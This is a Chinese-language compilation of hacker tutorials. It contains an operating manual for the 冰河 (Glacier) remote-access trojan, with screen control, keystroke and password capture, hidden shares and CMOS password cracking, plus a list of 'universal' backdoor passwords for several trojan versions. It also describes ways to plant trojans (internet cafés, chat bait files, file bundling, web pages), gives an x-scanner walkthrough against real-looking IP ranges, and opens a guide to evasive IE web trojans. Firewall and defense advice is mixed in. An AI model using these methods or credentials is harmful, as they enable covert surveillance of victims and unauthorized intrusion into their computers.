由于冰河2.0的改版较大,所以2.0以后版本與以前各版本完全不相容。为此只能向老用户提供一套升级方案:对于1.1版本的用户(好象已经没什么人用了),可以先用1.1或1.2版的CLIENT端将新版本的SERVER程式上传至被監控端,然后执行'檔打开'命令即可;对于1.2版本的用户相对簡單,只要通过1.2版的CLIENT远端打开新版本的SERVER程式就可以自动升级了。2.0以后的各版本完全相容。
'DARKSUN專版'中还提供了另一种升级方法,可以免去在不同版本中切换的麻煩。如果您不能確定远端主机的冰河版本,在用'檔管理器'流览目录前,最好先在工具欄下的'当前連接'列表框中选择打算連接的主机,然后直接点'升级1.2版本'按鈕进行升级,如果返回的资讯是'无法解释的命令',那说明远端主机安装了2.0以上版本,具体的版本及系统资讯可以通过'命令控制台'的'口令类命令\系统资讯及口令\系统资讯'来查看。
四.各模組簡要说明:
安装好伺服器端監控程序后,运行用户端程式就可以对远端电脑进行監控了,用户端执行程式的各模組功能如下:
1. "添加主机": 将被監控端IP位址添加至主机列表,同时設置好访問口令及埠,設置将保存在'Operate.ini'檔中,以后不必重輸。如果需要修改設置,可以重新添加该主机,或在主介面工具欄内重新輸入访問口令及埠并保存設置;
2. "刪除主机": 将被監控端IP位址从主机列表中刪除(相关設置也将同时被清除);
3. "自动搜索": 搜索指定子网内安装有'冰河'的电脑。(例如欲搜索IP地址'192.168.1.1'至'192.168.1.255'网段的电脑,应将'起始域'設为'192.168.1',将'起始位址'和'终止位址'分别設为'1'和'255');
4. "查看螢幕": 查看被監控端螢幕(相当于命令控制台中的'控制类命令\捕获螢幕\查看螢幕');
5. "螢幕控制": 远端类比滑鼠及鍵盤輸入(相当于命令控制台中的'控制类命令\捕获螢幕\螢幕控制')。其余同"查看螢幕";
6. "冰河信使": 点对点聊天室,也就是传说中的'二人世界';
7. "升级1.2版本": 通过'DARKSUN專版'的冰河来升级远端1.2版本的伺服器程式;
8. "修改远端配置": 线上修改访問口令、監听埠等伺服器程式設置,不需要重新上传整个檔,修改后立即生效;
9. "配置本端伺服器程式": 在安装前对'G_Server.exe'进行配置(例如是否将动態IP发送到指定信箱、改变監听埠、設置访問口令等)。
五.文件管理器操作说明:
檔管理器对檔操作提供了下列滑鼠操作功能:
1. 文件上传:右鍵單击欲上传的檔,选择'复制',在目的目录中粘帖即可。也可以在目的目录中选择'檔上传自',并选定欲上传的文件;
2. 文件下載:右鍵單击欲下載的檔,选择'复制',在目的目录中粘帖即可。也可以在选定欲下載的檔后选择'檔下載至',并选定目的目录及檔案名;
3. 打开远端或本地檔:选定欲打开的檔,在彈出功能表中选择'远端打开'或'本地打开',对于可执行檔若选择了'远端打开',可以进一步設置檔的运行方式和运行參数(运行參数可为空);
4. 刪除檔或目录:选定欲刪除的檔或目录,在彈出功能表中选择'刪除';
5. 新建目录:在彈出功能表中选择'新建檔夾'并輸入目录名即可;
6. 文件查找:选定查找路徑,在彈出功能表中选择'檔查找',并輸入檔案名即可(支持通配符);
7. 拷貝整个目录(只限于被監控端本机):选定原始目录并复制,选定目的目录并粘帖即可。
六.命令控制台主要命令:
1. 口令类命令: 系统资讯及口令、歷史口令、击鍵记录;
2. 控制类命令: 捕获螢幕、发送资讯、进程管理、視窗管理、滑鼠控制、系统控制、其他控制(如'鎖定註冊表'等);
3. 网路类命令: 創建共用、刪除共用、查看网路资讯;
4. 文件类命令: 目录增刪、文本流览、檔查找、壓縮、复制、移动、上传、下載、刪除、打开(对于可执行檔则相当于創建进程);
5. 註冊表读写: 註冊表鍵值读写、重命名、主鍵流览、读写、重命名;
6. 設置类命令: 更换墙紙、更改电脑名、读取伺服器端配置、线上修改伺服器配置。
七.使用技巧:
1. 用'查看螢幕'命令抓取对方螢幕资讯后,若希望程式自动跟踪对方的螢幕变化,在右鍵彈出功能表中选中'自动跟踪'项即可;
2. 在檔操作过程中,滑鼠雙击本地檔将在本地开该檔;滑鼠雙击远端檔将先下載该檔至臨时目录,然后在本地打开;
3. 在使用'网路共用創建'命令时,如果不希望其他人看到新創建的共用名稱,可以在共用名稱后加上'$'符号。自己欲流览时只要在IE的位址欄或'开始菜單'的'运行'对話方塊内鍵入'\\[机器名]\[共用名稱(含'$'符号)]即可;
4. 在1.2以后的版本中允许用户設定捕获圖像的色深(1~7级),圖像将按設定保存为2的N次方种顏色(N=2的[1~7]次方),即1级为單色,2级为16色,3级为256色,依此类推。
需要说明的是如果将色深設为0或8则表示色深依被監控端当前的解析度而定,适当減小色深可以提高圖像的传輸速度。
2.1以后的版本新增了以JPEG格式传輸圖像的功能,以利于在INTERNET上传輸圖像,但这项功能只适用于2.1以上版本(制被控端),否则实际上仍是通过BMP圖像格式传輸,所以请先確认版本后再使用。
八.常見問題:
1. 安装不成功,该問題通常是由于TCP/IP协议安装或設置不正確所致;
2. 被監控端啟动时或與監控端連接时彈出'建立連接'对話方塊,该問題是由于系统設置了自动撥号屬性。可以通过安装前定制伺服器程式来禁止自动撥号;
3. 可以連接但没有反应,通常是版本不匹配所致,因为1.2以前的版本設計上存在缺陷,所以如果您不能確定远端主机的冰河版本,最好先按照前面所说的升级辦法试一下,否则被監控端可能会出现错误提示。另外冰河没有提供代理功能,局域网外无法監控局域网内的机器,除非被控端是閘道;
4. '更换墙紙'命令无效,这个問題的可能性太多了,较常見的原因是被監控端的桌面設置为'按WEB页查看';
5. 对被監控端进行檔或目录的增刪操作后,少数情況不会自动刷新,可以通过[Ctrl+R]或选择彈出功能表的'刷新'命令手动刷新;
6. 开机口令不正確,因为CMOS口令是單向编码,所以编码后的口令是不可逆也是不唯一的,冰河通过窮举算出来的口令可能與原口令不符,但也是有效口令。毛主席说过没有調查就没有发言权,所以没有试过就千萬别妄下定论;
7. 佔用系统资源过高,其实準確的说应该是CPU利用率过高,系统资源佔用并不算过分,这主要是不断探測口令资讯(敏感字元)造成的,所以在'DARKSUN專版'中允许用户将该功能遮罩(我实在不知道怎样才能兼顧魚和熊掌),只要在配置时清空'敏感字元'中的所有字串就行了。
8. 如何卸載冰河,这是我解答次数最多的一个問題,其实冰河1.2正式版以后的各版本都在CLIENT端提供了徹底的卸載功能。对于1.2版本,请执行命令列表中的'自动卸載'命令,对其以后的版本,请执行'命令控制台'中的'控制类命令\系统控制\自动卸載冰河'。
小编有言:说说卸冰河木马方法和冰河的通用密码
很多朋友問我中了木马“冰河”有什么方法可以卸掉,其实很簡單,有两个方法:
(1)用殺毒软体“金山毒霸”就可以卸掉。但有朋友说用“金山”卸掉“冰河”后
打不开本文檔了,那你可以用手动方法去卸。如果你覺得那个辦法太麻煩,可以用我介绍的第二种方法。
(2)用“冰河”卸“冰河”: 如果你確定你的机器种了冰河,那你上网后开啟冰河。 在增添主机那里添自己的IP。 然后电击自己的IP, 选命令控制台那里选控制命令里的系统命令。 然后自己看啦。不要再说你不会啊。我会暈的啊。:)
冰河通用密码
3.0版:yzkzero.51.net
3.0版:yzkzero!
3.1-netbug版密码: 123456!@
2.2殺手專版:05181977
2.2殺手專版:dzq2000!
文:殘
了解如何种植木马才能防止别人种植木马。看看一般人用的手段。(本文比较适合入门级别选手)
1.网吧种植
这个似乎在以前很流行,先关閉网吧的放火墙,再安装木马用户端,立刻结帳下机,注意,重点是不要重起机器,因为现在网吧都有还原精靈,所以在不关机器的情況下,木马是不会给发现的。因此,在网吧上网,首先要重起机器,其次看看殺毒软体有没有打开。最后建议,不要在网吧打开有重要密码的東西,如网路銀行等。毕竟现在木马用户端躲避防火墙的能力很強,其次是还存在其他的病毒。
2.通讯软体传送
发一条消息给你,说,“这个我的照片哦,快看看。”当你接受并打开的时候,你已经中了木马了。(此时,你打开的檔好象“没有任何反应”)“她”可能接者说说:“呀,发错了。再見。”防禦:不要輕易接受别人传的東西,其次是打开前要用殺毒软体查毒。
3.恐怖的捆綁
捆綁软体现在很多,具体使用就是把木马用户端和一个其他檔捆綁在一起(拿JPG圖像为例),你看到的檔可能是.jpg,圖示也是正常(第2条直接传的木马用户端是个windows无法识别檔的圖示,比较好认),特别是现在有些捆綁软体对捆綁过后的软体进行優化,殺毒软体很难识别其中是否包含木马程式。建议:不要打开陌生人传递的檔。特别是圖像檔。(誘惑力大哦)
4.高深的编譯
对木马客户程式进行编譯。让木马更加难以识别。(其实效果同第三条)
5.微妙的网页嵌入
将木马安装在自己的主页里面,当你打开页面就自动下載运行。(見下篇,打造网页木马)“你中獎了,请去www.**.com領取你的獎品”,骇客可能这么和你说。建议:陌生人提供的网页不要打开,不要去很奇怪名字的网站。及时升级殺毒软体。
總结:及时升级殺毒软体。不要打开未知檔以及陌生人传来的檔。不要隨便打开陌生网页。升级最新版本的作業系统。还有....请看本專題以后的文章咯。
============================================================
你也可以当骇客 打造完美的IE网页木马
(殘语:比较适合骇客中级选手,日后将推出視頻教程)
既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标準,我个人认为一个完美的IE网页木马至少应具備下列四项特徵:
一:可以躲过殺毒软体的追殺;
二:可以避开网路防火墙的報警;
三:能够适用于多数的Windows作業系统(主要包括Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003)中的多数IE版本(主要包括IE5.0、IE5.5、IE6.0),最好能打倒SP補丁;
四:让流览者不容易发覺IE变化,即可以悄无聲息,从而可以长久不被发现。
(注意以上四点只是指网页本身而言,但不包括你的木马程式,也就是说我们的网页木马只是負責运行指定的木马程式,至于你的木马程式的好坏只有你自己去选择啦!别找我要,我不会写的哦!)
满足以上四点我想才可以让你的马兒更青春更长久,跑的更歡更快……
看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足吧!
第一种:利用古老的MIME漏洞的IE网页木马
这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影響又太大,補丁差不多都補上啦,因此这种木马的种植成功率比较低。
第二种:利用com.ms.activeX.ActiveXComponent漏洞,结合WSH及FSO控制项的IE网页木马
雖然com.ms.activeX.ActiveXComponent漏洞廣泛存在于多数IE版本中,是一个比较好的漏洞,利用价值非常高,但卻因为它结合了流行的病毒調用的WSH及FSO控制项,使其雖说可以避开网路防火墙的報警,可逃不脫殺毒软体的追捕(如諾頓)。
第三种:利用OBJECT物件类型確认漏洞(ObjectDataRemote)并结合WSH及FSO控制项的IE网页木马(典型的代表有动鯊网页木马生成器)
此种木马最大的優点是适应的IE版本多,且漏洞较新,但卻有如下不足:
1、因为此漏洞要調用Mshta.exe来访問网路下載木马程式,所以会引起防火墙報警(如天网防火墙);
2、如果此IE网页木马又利用了WSH及FSO控制项,同样逃不脫殺毒软体的追捕(如諾頓),而动鯊网页木马又恰恰使用了WSH及FSO控制项,歎口氣……可惜呀……?
3、再有就是这个漏洞需要网页伺服器支援动態网页如ASP、JSP、CGI等,这就影響了它的发揮,毕竟现在的免費穩定的动態网页空间是少之又少;雖说此漏洞也可利用郵件MIME的形式来利用,但经測试发现对IE6.0不起作用。
看到上面的分析你是不是有了这种感覺:千軍易得,一将难求,马兒成群,奈何千里马难寻!别急,下面让我帶这大家一起打造我心中的完美IE网页木马。
=======================================================
扫描器的使用
这里我使用x-scanner作为介绍物件,原因是x-scanner集成了多种扫描功能于一身,它可以采用多线程方式对指定IP位址段(或独立IP位址)进行安全漏洞扫描,提供了圖形介面和命令行两种操作方式,扫描内容包括:标準埠狀態及埠banner资讯、CGI漏洞、RPC漏洞、SQL-SERVER默认帳户、FTP弱口令,NT主机共用资讯、用户资讯、組资讯、NT主机弱口令用户等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引檔。对于一些已知的CGI和RPC漏洞,x-scanner给出了相应的漏洞描述、利用程式及解决方案,节省了查找漏洞介绍的时间。
首先x-scanner包括了两个运行程式:xscann.exe和xscan_gui.exe,这两个程式分别是扫描器的控制台版本和視窗版本,作为初学者可能更容易接受視窗版本的扫描软体,因为毕竟初学者使用最多的还是“应用程式”,无论运行那一个版本,他们的功能都是一样的。首先让我们运行視窗版本看看:視窗分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏洞扫描、埠扫描等基本内容;另一部分是有关扫描範圍的設定,xscanner可以支持对多个IP位址的扫描,也就是说使用者可以利用xscanner成批扫描多个IP位址,例如在IP位址範圍内輸入211.100.8.1-211.100.8.255就会扫描整个C类的255台伺服器(如果存在的話),这样骇客可以針对某一个漏洞进行搜索,找到大範圍内所有存在某个漏洞的伺服器。当然如果只輸入一个IP位址,扫描程式将針对單独IP进行扫描。
剩下的埠設定在前面已经介绍过,一般对于网站伺服器,这个埠选取80或者8080,对于某些特殊的伺服器也许还有特殊的埠号,那需要通过埠扫描进行寻找。多线程扫描是这个扫描器的一大特色,所谓多线程就是说同时在本地系统开闢多个socket連接,在同一时间内扫描多个伺服器,这样做的好处是提高了扫描速度,节省时间,根據系统的资源配置高低,线程数位也可以自行設定(設定太高容易造成系统崩溃)。
在圖形介面下我们看到了程式連接位址“.\xscan.exe”,这实际上就是xscanner的控制台程式,也就是说圖形視窗只是将控制台扫描器的有关參数設置做了“傻瓜化”处理,程式运行真正执行的还是控制台程式。因此学习控制台是骇客所必需的,而且使用控制台模式的程式也是真正骇客喜爱的操作方式。
现在我们进行一个簡單的cgi漏洞扫描,这次演练是在控制台模式下进行的:xscan211.100.8.87 -port
这个命令的意思是让xscanner扫描伺服器211.100.8.87的开放埠,扫描器不会对65535个埠全部进行扫描(太慢),它只会檢測网路上最常用的几百个埠,而且每一个埠对应的网路服務在扫描器中都已经做过定義,从最后返回的结果很容易了解伺服器运行了什么网路服務。扫描结果顯示如下:
Initialize dynamic librarysucceed.
Scanning 211.100.8.87 ......
[211.100.8.87]: Scaningport state ...
[211.100.8.87]: Port 21 islistening!!!
[211.100.8.87]: Port 25 islistening!!!
[211.100.8.87]: Port 53 islistening!!!
[211.100.8.87]: Port 79 islistening!!!
[211.100.8.87]: Port 80 islistening!!!
[211.100.8.87]: Port 110 islistening!!!
[211.100.8.87]: Port 3389is listening!!!
[211.100.8.87]: Port scancompleted, found 7.
[211.100.8.87]: All done.
这个结果还会同时在log目录下生成一个html文檔,阅读文檔可以了解发放的埠对应的服務專案。从结果中看到,这台伺服器公开放了七个埠,主要有21埠用于檔传輸、80埠用于网页流览、还有110埠用于pop3电子郵件,如此一来,我们就可以进行有关服務的漏洞扫描了。(关于埠的詳細解释会在后續给出)
然后可以使用流览看看这个伺服器到底是做什么的,通过流览发现原来这是一家報社的电子版面,这样骇客可以繼續对伺服器进行漏洞扫描查找伺服器上是否存在perl漏洞,之后进行进一步进攻。
漏洞扫描的道理和埠扫描基本上类似,例如我们可以通过扫描器查找61.135.50.1到61.135.50.255这255台伺服器上所有开放了80埠的伺服器上是否存在漏洞,并且找到存在什么漏洞,则可以使用xscan61.135.50.1-61.135.50.255 -cgi进行扫描,因为结果比较多,通过控制台很难阅读,这个时候xscanner会在log下生成多个html的中文说明,进行阅读这些文檔比较方便。
二、扫描器使用問題:
載使用漏洞扫描器的过程中,学习者可能会经常遇到一些問題,这里给出有关問題產生的原因和解决辦法。扫描器的使用并不是真正骇客生涯的开始,但它是学习骇客的基础,所以学习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和問題的解决辦法。
1、为什么我找不到扫描器報告的漏洞?
扫描器報告伺服器上存在某个存在漏洞的檔,是发送一个GET请求并接收伺服器返回值来判断檔是否存在,这个返回值在HTTP的协议中有詳細的说明,一般情況下“200”是檔存在,而“404”是没有找到檔,所以造成上面现象的具体原因就暴露出来了。
造成这个問題的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在“千年蟲”問題,对于返回的资讯扫描器在判断的时候,会错误的以为时间资讯2000年x月x日中的200是“檔存在”标誌,这样就会造成误報;
另外一种可能性是伺服器本身对“檔不存在”返回的頭部资讯进行了更改,如果GET申请的檔不存在,伺服器会自动指向一个“没有找到页面”的文檔,所以无论檔是否存在,都不会将“404”返回,而是仍然返回成功资讯,这样做是为了迷惑漏洞扫描器,让攻击者不能真正判断究竟那个漏洞存在于伺服器上。
这一問題的解决辦法也要分情況討论,一般说来第一种情況比较容易解决,直接升级漏洞扫描器就可以了,对于第二种情況需要使用者对网路比较熟悉,有能力的話可以自己编写一个漏洞扫描器,自己编写的扫描器可以針对返回檔的大小进行判断,这样就可以真正確定檔是否存在,但这种方法对使用者的能力要求较高。
2、我使用的扫描器速度和网路速度有关係嘛?
关係不大。扫描器发送和接收的资讯都很小,就算是同时发送上百个GET请求一般的电話上网用户也完全可以做得到,影響扫描器速度的主要因素是伺服器的应答速度,这取决于被扫描伺服器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支援多线程的扫描器,但是因为使用者本地电脑檔次問題,也不可能将线程設置到上百个,那样的話会造成本地系统癱瘓,一般使用30个线程左右比较合适。
另外对于很多网路服務器来说,为了防止骇客的扫描行为,可能会在防火墙上設置同一IP的單位时间GET申请数量,这样做目的就是避免骇客的扫描和攻击,所以在提高本地扫描速度之前,应该先確认伺服器没有相应的过濾功能之后再使用。
3、扫描器報告给我的漏洞无法利用是什么原因?
確切地说扫描器報告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的檔,各种网路应用程式都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修補上,被扫描器找到的檔应该经过手工操作確认其是否是存在漏洞的版本,这可以通过阅读网路安全网站的“安全公告”获得相应知识。
对于已经修補上漏洞的檔来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没有漏洞了,也许在明天,这个新版本的檔中又会被发现还存在其他漏洞,因此这需要网路安全爱好者时刻关注安全公告。当然如果攻击者或者网路管理员对编程比较熟悉,也可以自己阅读程式并力圖自己找到可能的安全隱患,很多世界者名的骇客都是不依*他人,而是自己寻找漏洞进行攻击的。
4、扫描器版本比较新,然而卻从来没有找到过漏洞是什么原因?
有一些扫描器專门設計了“等待时间”,经过設置可以对等待返回资讯的时间进行調整,这就是说在“网路連接超时”的情況下,扫描器不会傻傻的一直等待下去。但如果你的网路速度比较慢,有可能造成扫描器没有来得及接收返回资讯就被认为“超时”而越了过去繼續下面的扫描,这样当然是什么也找不到啦。
如果問題真的如此,可以将等待时间設置的长一些,或者换个ISP撥号連接。
5、扫描器報告伺服器没有提供HTTP服務?
网路上大多数HTTP伺服器和漏洞扫描器的默认埠都是80,而有少量的HTTP伺服器并不是使用80埠提供服務的,在確认伺服器的確开通了网站服務的情況下,可以用埠扫描器察看一下对方究竟使用什么埠进行的HTTP服務,网路上常見的埠还有8080。
另外这种情況还有一种可能性,也许是使用者对扫描器的參数設置不正確造成的,很多扫描器的功能不僅僅是漏洞扫描,有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,確保問題不是出在自己身上。
6、扫描器使用过程中突然停止回应是为什么?
扫描器停止回应是很正常的,有可能是因为使用者連接的线程过多,本地系统资源不足而造成系统癱瘓、也可能是因为对方伺服器的回应比较慢,依次发送出去的请求被同时反送回来而造成资讯阻塞、还有可能是伺服器安装了比较惡毒的防火墙,一旦察覺有人扫描就发送特殊的资料報回来造成系统癱瘓……
因此扫描器停止回应不能簡單的说是为什么,也没有一个比较全面的解决方案,不过一般情況下遇到这种問題,我建议你可以更换其他扫描器、扫描另外一些伺服器试试,如果問題还没有解决,就可能是因为扫描器與你所使用的系统不相容造成的,大多数基于微软視窗的漏洞扫描器都是运行在Windows9X下的,如果是Win2000或者NT也有可能造成扫描器无法正常工作。
7、下載回来的扫描器里面怎么没有可执行檔?
扫描器不一定非要是可执行的exe檔,其他例如perl、cgi脚本语言也可以编写扫描器,因此没有可执行檔的扫描器也许是运行在网路服務器上的,这种扫描器可以被植入到网路上的其他系统中,不需要使用者上网就能够24小时不停的进行大面积位址扫描,并将结果整理、分析,最后通过Email发送到指定的电子信箱中,因此这是一种比较高级的扫描器,初学者不适合使用。
另外注意載下在扫描器的时候注意壓縮報檔的副檔名,如果是tar为副檔名,那么这个扫描器是运行在Linux系统下的,这种其他操作平台的扫描器无法在視窗平台下应用,檔格式也和FAT32不一样。
8、扫描器只報告漏洞名稱,不報告具体文件怎么辦?
只要漏洞被发现,网路安全組織即会为漏洞命名,因此漏洞名稱对应的檔在相当廣泛的範圍内都是统一的,只要知道了漏洞的名稱,骇客就可以通过專门的漏洞搜索引擎进行查找,并且学习到與找到漏洞相关的詳細资讯。这种“漏洞搜索引擎”在网路上非常多,例如我国“綠盟”提供的全中文漏洞搜索引擎就是比较理想的一个。
===========================================================
如何防範骇客
骇客对伺服器进行扫描是輕而易举的,一旦找到了伺服器存在的問題,那么后果将是嚴重的。这就是说作为网路管理员应该采取不要的手段防止骇客对伺服器进行扫描,本节我将談談如何才能让自己的伺服器免遭骇客扫描。
一、防範骇客心得体会:
1、遮罩可以IP位址:
这种方式見效最快,一旦网路管理员发现了可疑的IP位址申请,可以通过防火墙遮罩相对应的IP位址,这样骇客就无法在連接到伺服器上了。但是这种方法有很多缺点,例如很多骇客都使用的动態IP,也就是说他们的IP位址会变化,一个位址被遮罩,只要更换其他IP仍然可以进攻伺服器,而且高级骇客有可能会伪造IP地址,遮罩的也许是正常用户的地址。
2、过濾资讯包:
通过编写防火墙規则,可以让系统知道什么样的资讯包可以进入、什么样的应该放棄,如此一来,当骇客发送有攻击性资讯包的时候,在经过防火墙时,资讯就会被丟棄掉,从而防止了骇客的进攻。但是这种做法仍然有它不足的地方,例如骇客可以改变攻击性代码的形態,让防火墙分辨不出资讯包的真假;或者骇客乾脆无休止的、大量的发送资讯包,知道伺服器不堪重負而造成系统崩溃。
3、修改系统协定:
对于漏洞扫描,系统管理员可以修改伺服器的相应协定,例如漏洞扫描是根據对檔的申请返回值对檔存在进行判断的,这个数值如果是200则表示檔存在于伺服器上,如果是404则表明伺服器没有找到相应的檔,但是管理员如果修改了返回数值、或者遮罩404数值,那么漏洞扫描器就毫无用处了。
4、经常升级系统版本:
任何一个版本的系统发佈之后,在短时间内都不会受到攻击,一旦其中的問題暴露出来,骇客就会蜂擁而致。因此管理员在维护系统的时候,可以经常流览者名的安全站点,找到系统的新版本或者補丁程式进行安装,这样就可以保证系统中的漏洞在没有被骇客发现之前,就已经修補上了,从而保证了伺服器的安全。
5、及时備份重要资料:
亡羊補牢,如果资料備份及时,即便系统遭到骇客进攻,也可以在短时间内修复,挽回不必要的经濟損失。想国外很多商務网站,都会在每天晚上对系统资料进行備份,在第二天清晨,无论系统是否收到攻击,都会重新恢复资料,保证每天系统中的资料庫都不会出现損坏。资料的備份最好放在其他电脑或者驅动器上,这样骇客进入伺服器之后,破坏的资料只是一部分,因为无法找到资料的備份,对于伺服器的損失也不会太嚴重。
然而一旦受到骇客攻击,管理员不要只設法恢复損坏的资料,还要及时分析骇客的来源和攻击方法,尽快修補被骇客利用的漏洞,然后檢查系统中是否被骇客安装了木马、蠕蟲或者被骇客开放了某些管理员帳号,尽量将骇客留下的各种蛛絲马迹和后门分析清除、清除乾淨,防止骇客的下一次攻击。
6、使用加密机制传輸资料:
对于个人信用卡、密码等重要资料,在用户端與伺服器之间的传送,应该仙经过加密处理在进行发送,这样做的目的是防止骇客監听、截获。对于现在网路上流行的各种加密机制,都已经出现了不同的破解方法,因此在加密的选择上应该寻找破解困难的,例如DES加密方法,这是一套没有逆向破解的加密演算法,因此骇客的到了这种加密处理后的檔时,只能采取暴力破解法。个人用户只要选择了一个優秀的密码,那么骇客的破解工作将会在无休止的尝试后终止。
二、防火墙使用说明:
1.什么是防火墙?
防火墙的英文叫做firewall,它能够在网路與电脑之间建立一道監控屏障,保护在防火墙内部的系统不受网路骇客的攻击。邏輯上講,防火墙既是资讯分離器、限制器,也是资讯分析器,它可以有效地对局域网和Internet之间的任何活动进行監控,从而保证局域网内部的安全。
网路上最者名的软体防火墙是LockDown2000,这套软体需要经过註冊才能获得完整版本,它的功能強大,小到保护个人上网用户、大到维护商務网站的运作,它都能出色的做出驚人的表现。但因为软体的註冊需要一定費用,所以对个人用户来说还是选择一款免費的防火墙更现实。天网防火墙在这里就更加适合个人用户的需要了,天网防火墙个人版是一套给个人电脑使用的网路安全程式,它能够抵擋网路入侵和攻击,防止资讯洩露。
2、天网防火墙的基本功能:
天网防火墙个人版把网路分为本地网和互联网,可以針对来自不同网路的资讯,来設置不同的安全方案,以下所述的問題都是針对互联网而言的,故所有的設置都是在互联网安全级别中完成的。 怎样防止资讯洩露? 如果把檔共用向互联网开放,而且又不設定密码,那么别人就可以輕鬆的通过互联网看到您机器中的檔,如果您还允许共用可写,那别人甚至可以刪除檔。 你可以在个人防火墙的互联网安全级别設置中,将NETBIOS 关閉,这样别人就不能通过INTERNET访問你的共用资源了(这种設置不会影響你在局域网中的资源分享)。
当撥号用户上网获得了分配到的IP位址之后,可以通过天网防火墙将ICMP关閉,这样骇客用PING的方法就无法確定使用者的的系统是否处于上网狀態,无法直接通过IP位址获得使用者系统的资讯了。
需要指出的是:防火墙攔截的资讯并不完全是攻击资讯,它记录的只是系统在安全設置中所拒絕接收的资料包。在某些情況下,系统可能会收到一些正常但又被攔截的资料包,例如某些路由器会定时发出一些IGMP包等;或有些主机会定时PING出资料到本地系统確认連接仍在维持者,这个时候如果利用防火墙将ICMP和IGMP遮罩了,就会在安全记录中見到这些被攔截的资料包,因此这些攔截下来的资料包并不一定是骇客对系统进行攻击造成的。
3、使用防火墙的益处:
使用防火墙可以保护脆弱的服務,通过过濾不安全的服務,Firewall可以极大地提高网路安全和減少子网中主机的風險。例如,Firewall可以禁止NIS、NFS服務通过,同时可以拒絕源路由和ICMP重定向封包。
另外防火墙可以控制对系统的访問许可权,例如某些企業允许从外部访問企業内部的某些系统,而禁止访問另外的系统,通过防火墙对这些允许共用的系统进行設置,还可以設定内部的系统只访問外部特定的Mail Server和Web Server,保护企業内部资讯的安全。
4、防火墙的种类:
防火墙總体上分为包过濾、应用级閘道和代理伺服器等三种类型:
(1)数據包过濾
资料包过濾(PacketFiltering)技术是在网路層对资料包进行选择,选择的依據是系统内設置的过濾邏輯,被稱为访問控制表(Access ControlTable)。通过檢查资料流程中每个资料包的源位址、目的地址、所用的埠号、协定狀態等因素,或它们的組合来確定是否允许该资料包通过。 资料包过濾防火墙邏輯簡單,价格便宜,易于安装和使用,网路性能和透明性好,它通常安装在路由器上。路由器是内部网路與Internet連接必不可少的設備,因此在原有网路上增加这样的防火墙几乎不需要任何額外的費用。
资料包过濾防火墙的缺点有二:一是非法访問一旦突破防火墙,即可对主机上的软体和配置漏洞进行攻击;二是资料包的源位址、目的地址以及IP的埠号都在资料包的頭部,很有可能被竊听或假冒。
(2)应用级閘道
应用级閘道(ApplicationLevel Gateways)是在网路应用層上建立协定过濾和轉发功能。它針对特定的网路应用服務协定使用指定的资料过濾邏輯,并在过濾的同时,对资料包进行必要的分析、登记和统計,形成報告。实际中的应用閘道通常安装在專用工作站系统上。
资料包过濾和应用网关防火墙有一个共同的特点,就是它们僅僅依*特定的邏輯判定是否允许资料包通过。一旦满足邏輯,则防火墙内外的电脑系统建立直接联系,防火墙外部的用户便有可能直接了解防火墙内部的网路结構和运行狀態,这有利于实施非法访問和攻击。
(3)代理服務
代理服務(Proxy Service)也稱鏈路级閘道或TCP通道(Circuit LevelGateways or TCP Tunnels),也有人将它歸于应用级閘道一类。它是針对资料包过濾和应用閘道技术存在的缺点而引入的防火墙技术,其特点是将所有跨越防火墙的网路通信鏈路分为两段。防火墙内外电脑系统间应用層的" 鏈结",由两个终止代理伺服器上的" 鏈结"来实现,外部电脑的网路鏈路只能到达代理伺服器,从而起到了隔離防火墙内外电脑系统的作用。此外,代理服務也对过往的资料包进行分析、註冊登记,形成報告,同时当发现被攻击迹象时会向网路管理员发出警報,并保留攻击痕迹
=========================================================
骇客之“名詞介绍”
1.肉雞,或者留了后门,可以被我们远端操控的机器,现在许多人把有WEBSHELL许可权的机器也叫肉雞。
2、木马:特洛伊木马,大家在电影《特洛伊》里应该看到了,戰爭是特絡伊故意留下了个木马,多方以为是戰利品,帶回城后,木马里面全是戰士,这种東西,就叫做木马,可以说木马就是一方给肉雞留下的東西,可以做到远端控制的目的,木马还分不同的作用,有盜号專用的木马,有远程控制專用的木马,下面介绍点:盜号專用的有许多,盜QQ的有 啊拉QQ大盜,強強盜QQ,传奇木马生成器,魔獸木马生成器等;远程控制的木马有:冰河(国人的驕傲,中国第一款木马),灰鴿子,PCshare,网路神偷,FLUX等,现在通过线程插入技术的木马也有很多,大家自己找找吧。
3、病毒:这个我想不用解释了吧,相信大家都和它打过交道,病毒大多具有破坏性,传播性,隱秘性,潛伏性。
4、后门:这个就是入侵后为方便我们下次进入肉雞方便点所留下的東西,親切的稱为后门,现在好点的后门有REDMAIN等。
5、CRACK:这个名詞很容易和HACK混淆,但是许多人不理解CRACK这个東西,但是接触过软体破解的人一定了解这个詞 CRACKER分析下就是软体破解者的意思(注意这里有多了个ER),许多共用软体就是我们的CRACKER来完成破解的,就是现在俗稱的XX软体破解版。
